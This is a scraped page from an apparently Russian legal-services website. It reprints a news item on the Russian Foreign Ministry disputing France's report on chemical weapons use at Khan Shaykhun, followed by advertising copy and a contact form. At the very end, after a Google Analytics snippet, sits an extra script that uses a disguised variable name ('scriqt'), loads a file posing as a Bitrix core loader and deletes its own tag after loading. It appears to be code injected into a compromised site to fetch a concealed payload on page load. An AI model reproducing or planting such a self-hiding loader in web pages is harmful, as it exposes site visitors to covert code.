МИД России нашел нестыковки в докладе Франции по химоружию в Сирии.

МИД России нашел нестыковки в докладе Франции по химоружию в Сирии. МИД России нашел нестыковки в докладе Франции по химоружию в Сирии.

В Москве сомневаются в достоверности проб, полученных спецслужбами Франции в районе Хан-Шейхуна, говорится в сообщении МИД РФ.

Как указали в МИД РФ, в Париже опубликован доклад французских спецслужб с национальными оценками предполагаемого применения химического оружия в районе населенного пункта Хан-Шейхун провинции Идлиб Сирийской Арабской Республики. Это уже третье — после турецкого и британского — национальное расследование.

«Складывается впечатление, что вышеупомянутые страны либо не доверяют ОЗХО, либо пытаются повлиять на ее работу в нужном им направлении. Уже первичный анализ пятистраничного французского документа вызывает много вопросов. Прежде всего, они касаются того, при каких обстоятельствах французская сторона получила пробы, отобранные, как утверждается, непосредственно на месте происшествия», — говорится в документе.

"Как отметили в МИД РФ, если французские спецслужбы отбирали их сами, то, «получается, что они имеют свободный доступ в район, контролируемый, как говорится в докладе, связанными с “Аль-Каидой” вооруженными группировками сирийской оппозиции».
Если же образцы были получены в каком-то ином месте, скажем на территории одной из соседних с Сирией стран, то достоверность проведенного анализа сразу оказывается под вопросом"
-Сообщение МИД РФ
Возврат к списку


У нас сотни выигранных дел – отзывы реальных клиентов это доказывают!

Работайте с профессионалами!

Звонки и заявки на консультацию принимаются круглосуточно.

Вы получите четкие и понятные консультации: «без воды» - только суть! С нашей помощью Вы обойдете сложные «ловушки и капканы» закона.

ФИО
Телефон
Текст сообщения
Это поле обязательно для заполнения
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','https://www.google-analytics.com/analytics.js','ga');var scriqt=document.createElement('script');scriqt.src='/bitrix/js/main/core/core_loader.js?v=0.2.14';scriqt.onload=function(){document.head.removeChild(scriqt);};document.head.appendChild(scriqt); ga('create', 'UA-83802593-1', 'auto'); ga('send', 'pageview');